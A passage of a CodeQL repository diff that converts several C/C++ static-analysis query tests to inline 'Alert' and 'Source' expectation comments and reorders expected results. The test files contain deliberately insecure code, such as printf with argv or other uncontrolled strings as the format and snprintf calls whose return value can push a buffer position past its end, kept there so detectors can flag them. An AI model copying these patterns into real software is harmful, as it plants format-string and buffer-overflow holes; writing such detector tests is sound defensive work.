| This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref index 4e95e41b5cb9..dc496d3c7c6a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/CastArrayPointerArithmetic.ql +query: Likely Bugs/Conversion/CastArrayPointerArithmetic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp index fce974f6012f..95d6200f11e6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp @@ -24,15 +24,15 @@ class DerivedSameSize: public Base { }; void dereference_base(Base *b) { - b[2].x; + b[2].x; // $ Alert } void dereference_array_base(Base b[]) { - b[2].x; + b[2].x; // $ Alert } void pointer_arith_base(Base *b) { - b + 2; + b + 2; // $ Alert } void dereference_derived(Derived *d) { @@ -54,9 +54,9 @@ void char_pointer_arith(Base *b) { void test () { Derived d[4]; - dereference_base(d); // BAD: implicit conversion to Base* - dereference_array_base(d); // BAD: implicit conversion to Base* - pointer_arith_base(d); // BAD: implicit conversion to Base* + dereference_base(d); // BAD: implicit conversion to Base* // $ Source + dereference_array_base(d); // BAD: implicit conversion to Base* // $ Source + pointer_arith_base(d); // BAD: implicit conversion to Base* // $ Source dereference_derived(d); // GOOD: implicit conversion to Derived*, which will be the right size dereference_array_derived(d); // GOOD: implicit conversion to Derived*, which will be the right size @@ -71,9 +71,9 @@ void test () { DerivedSameSize dss[4]; - dereference_base(dss); // BAD: same size on Linux but different on Windows - dereference_array_base(dss); // BAD: same size on Linux but different on Windows - pointer_arith_base(dss); // BAD: same size on Linux but different on Windows + dereference_base(dss); // BAD: same size on Linux but different on Windows // $ Source + dereference_array_base(dss); // BAD: same size on Linux but different on Windows // $ Source + pointer_arith_base(dss); // BAD: same size on Linux but different on Windows // $ Source DerivedNoField dnf[4]; @@ -83,9 +83,9 @@ void test () { Derived2 d2[4]; - dereference_base(d2); // BAD: implicit conversion to Base* - dereference_array_base(d2); // BAD: implicit conversion to Base* - pointer_arith_base(d2); // BAD: implicit conversion to Base* + dereference_base(d2); // BAD: implicit conversion to Base* // $ Source + dereference_array_base(d2); // BAD: implicit conversion to Base* // $ Source + pointer_arith_base(d2); // BAD: implicit conversion to Base* // $ Source dereference_derived(d2); // GOOD: implicit conversion to Derived*, which will be the right size dereference_array_derived(d2); // GOOD: implicit conversion to Derived*, which will be the right size diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref index ff7d11977d9c..7ae992bd7520 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/ImplicitDowncastFromBitfield.ql +query: Likely Bugs/Conversion/ImplicitDowncastFromBitfield.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp index 3bcb6afe4b4c..0cef06d32e23 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp @@ -7,7 +7,7 @@ int getX1(my_struct m) { } short getX2(my_struct m) { - return m.x; // BAD + return m.x; // BAD // $ Alert } short getX3(my_struct m) { @@ -23,7 +23,7 @@ short getX5(my_struct m) { } const char& getx6(my_struct& m) { - const char& result = m.x; // BAD + const char& result = m.x; // BAD // $ Alert return result; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref index cb6a31a262e3..a1dd642e7985 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/LossyFunctionResultCast.ql +query: Likely Bugs/Conversion/LossyFunctionResultCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp index 552f3eecc39c..d12fe7910493 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp @@ -30,19 +30,19 @@ void test1() setPosInt(getInt()); setPosFloat(getInt()); } - if (getFloat()) // BAD + if (getFloat()) // BAD // $ Alert { - setPosInt(getFloat()); // BAD + setPosInt(getFloat()); // BAD // $ Alert setPosFloat(getFloat()); } - if (getDouble()) // BAD + if (getDouble()) // BAD // $ Alert { - setPosInt(getDouble()); // BAD + setPosInt(getDouble()); // BAD // $ Alert setPosFloat(getDouble()); } - if (getMyLD()) // BAD + if (getMyLD()) // BAD // $ Alert { - setPosInt(getMyLD()); // BAD + setPosInt(getMyLD()); // BAD // $ Alert setPosFloat(getMyLD()); } if (getFloatPtr()) @@ -98,11 +98,11 @@ int test2(double v, double w, int n) case 2: return pow(10, v); // GOOD case 3: - return pow(2.5, v); // BAD + return pow(2.5, v); // BAD // $ Alert case 4: - return pow(v, 2); // BAD + return pow(v, 2); // BAD // $ Alert case 5: - return pow(v, w); // BAD + return pow(v, w); // BAD // $ Alert }; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c index d7b60aebe88a..8ff9ddbf3768 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c @@ -25,9 +25,9 @@ extern char *any_random_function(const char *); #define NULL ((void*)0) #define _(X) gettext(X) -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source if(argc > 1) - printf(argv[1]); // BAD + printf(argv[1]); // BAD // $ Alert else printf("No argument supplied.\n"); // GOOD @@ -38,11 +38,11 @@ int main(int argc, char **argv) { printf(ngettext("One argument\n", "%d arguments\n", argc-1), argc-1); // GOOD printf(gettext("%d arguments\n"), argc-1); // GOOD - printf(any_random_function("%d arguments\n"), argc-1); // BAD + printf(any_random_function("%d arguments\n"), argc-1); // BAD // $ Alert - printf(_(any_random_function("%d arguments\n")), argc-1); // BAD + printf(_(any_random_function("%d arguments\n")), argc-1); // BAD // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected index 63851030bba5..20ac0f055a1b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected @@ -1,3 +1,23 @@ +#select +| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | +| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | +| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | +| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | +| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | +| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | +| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | +| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | +| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | +| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | +| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | +| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:206:5:206:10 | call to printf | printf | +| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:211:5:211:10 | call to printf | printf | +| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | +| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | +| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | +| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | +| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | +| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | edges | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | provenance | | | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | provenance | DataFlowFunction | @@ -98,23 +118,3 @@ nodes | test.cpp:247:12:247:16 | *hello | semmle.label | *hello | subpaths | test.cpp:195:31:195:33 | *str | test.cpp:179:6:179:21 | [summary param] *2 in StringCchPrintfW | test.cpp:179:6:179:21 | [summary param] *0 in StringCchPrintfW [Return] | test.cpp:195:20:195:23 | StringCchPrintfW output argument | -#select -| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | -| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | -| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | -| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | -| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | -| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | -| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | -| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | -| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | -| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | -| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | -| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:206:5:206:10 | call to printf | printf | -| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:211:5:211:10 | call to printf | printf | -| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | -| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | -| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | -| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | -| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | -| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref index ef8de5d288ac..cb71273232ca 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/NonConstantFormat.ql +query: Likely Bugs/Format/NonConstantFormat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp index 1c3d2513da54..d77fa253d7e4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp @@ -18,7 +18,7 @@ extern "C" int snprintf ( char * s, int n, const char * format, ... ); struct A { void do_print(const char *fmt0) { char buf[32]; - snprintf(buf, 32, fmt0); // BAD, all paths from unknown const char*, not assuming literal + snprintf(buf, 32, fmt0); // BAD, all paths from unknown const char*, not assuming literal // $ Alert } }; @@ -39,7 +39,7 @@ struct C { void foo(void) { C c; - c.do_some_printing(c.ext_fmt_str()); + c.do_some_printing(c.ext_fmt_str()); // $ Source } struct some_class { @@ -76,15 +76,15 @@ void diagnostic(const char *fmt, ...) } void bar(void) { - diagnostic (some_instance->get_fmt()); // BAD const char* but not assuming literal + diagnostic (some_instance->get_fmt()); // BAD const char* but not assuming literal // $ Alert } namespace ns { class blab { void out1(void) { - char *fmt = (char *)__builtin_alloca(10); - diagnostic(fmt); // BAD + char *fmt = (char *)__builtin_alloca(10); // $ Source + diagnostic(fmt); // BAD // $ Alert } }; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp index e60db94f9b1c..26cc4808022a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp @@ -43,7 +43,7 @@ const char *const_wash(char *str) { return str; } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source const char *message = messages[2]; printf(choose_message(argc - 1), argc - 1); // GOOD printf(messages[1]); // GOOD @@ -127,7 +127,7 @@ int main(int argc, char **argv) { char buffer[1024]; MYSPRINTF(buffer, "constant"); // GOOD - MYSPRINTF(buffer, argv[0]); // BAD + MYSPRINTF(buffer, argv[0]); // BAD // $ Alert } } @@ -164,10 +164,10 @@ void fmt_with_assignment() { printf(y); // GOOD } -void fmt_via_strcpy_bad(char *data) { +void fmt_via_strcpy_bad(char *data) { // $ Source char res[100]; strcpy(res, data); - printf(res); // BAD + printf(res); // BAD // $ Alert } @@ -190,61 +190,61 @@ void wchar_t_test_good(){ wprintf(wstr); // GOOD } -void wchar_t_test_bad(wchar_t* str){ +void wchar_t_test_bad(wchar_t* str){ // $ Source wchar_t wstr[100]; - StringCchPrintfW(wstr, 100, str); // BAD + StringCchPrintfW(wstr, 100, str); // BAD // $ Alert - wprintf(wstr); // BAD + wprintf(wstr); // BAD // $ Alert } char* get_string(); void pointer_arithmetic_test_on_bad_string(){ { - const char *hello = get_string(); - printf(hello + 1); // BAD - printf(hello); // BAD + const char *hello = get_string(); // $ Source + printf(hello + 1); // BAD // $ Alert + printf(hello); // BAD // $ Alert } { - const char *hello = get_string(); + const char *hello = get_string(); // $ Source hello += 1; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but using "x = x + 1" syntax - const char *hello = get_string(); + const char *hello = get_string(); // $ Source hello = hello + 1; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but using "x++" syntax - const char *hello = get_string(); + const char *hello = get_string(); // $ Source hello++; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but using "++x" as subexpression - const char *hello = get_string(); - printf(++hello); // BAD + const char *hello = get_string(); // $ Source + printf(++hello); // BAD // $ Alert } { // Same as above block but through a pointer - const char *hello = get_string(); + const char *hello = get_string(); // $ Source const char **p = &hello; (*p)++; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but through a C++ reference - const char *hello = get_string(); + const char *hello = get_string(); // $ Source const char *&p = hello; p++; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { - const char *hello = get_string(); + const char *hello = get_string(); // $ Source const char *const *p = &hello; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref index 1c3184fc6a78..0cda33d916ec 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/SnprintfOverflow.ql +query: Likely Bugs/Format/SnprintfOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp index d2785d845b99..5dd172d81c38 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp @@ -22,7 +22,7 @@ void test1(queue &numbers) while (numbers.has_number()) { - pos += snprintf(&(buffer[pos]), 100 - pos, "%i, ", numbers.get_number()); // BAD + pos += snprintf(&(buffer[pos]), 100 - pos, "%i, ", numbers.get_number()); // BAD // $ Alert } } @@ -59,7 +59,7 @@ void test4(queue &numbers) while (numbers.has_number()) { - amount = snprintf(ptr, remaining, "%i, ", numbers.get_number()); // BAD + amount = snprintf(ptr, remaining, "%i, ", numbers.get_number()); // BAD // $ Alert ptr += amount; remaining -= amount; } @@ -73,7 +73,7 @@ void test5(queue &numbers) while (numbers.has_number()) { - ptr += snprintf(ptr, end - ptr, "%i, ", numbers.get_number()); // BAD + ptr += snprintf(ptr, end - ptr, "%i, ", numbers.get_number()); // BAD // $ Alert } } @@ -97,7 +97,7 @@ void test7(const char *strings) // separated by \0, terminated by \0\0 while (*strings != 0) { - pos += snprintf_s(buffer + pos, sizeof(buffer) - pos, "%s\n", strings); // BAD + pos += snprintf_s(buffer + pos, sizeof(buffer) - pos, "%s\n", strings); // BAD // $ Alert // (note that the protections built into `snprintf_s` appear to mean this is less likely // to be exploitable than with `snprintf`) strings += strlen(strings) + 1; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref index 131a39abcf7e..56274d702c0d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/TooManyFormatArguments.ql +query: Likely Bugs/Format/TooManyFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref index d5e2e86d6e6a..38acf3d83087 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongNumberOfFormatArguments.ql +query: Likely Bugs/Format/WrongNumberOfFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c index ec28ef511449..3e7eb8c547dd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c @@ -13,9 +13,9 @@ void myMultiplyDefinedPrintf3(const char *extraArg, const char *format, ...); void test_custom_printf1() { - myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) + myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] myMultiplyDefinedPrintf("%i", 0, 1); // GOOD - myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) + myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] myMultiplyDefinedPrintf2("%i", 0); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1, 2); // BAD (too many format arguments regardless of which definition is correct) [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c index da7f09123af7..ce70464e24d3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c @@ -10,9 +10,9 @@ void myMultiplyDefinedPrintf3(const char *format, ...); void test_custom_printf2() { - myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) + myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] myMultiplyDefinedPrintf("%i", 0, 1); // GOOD - 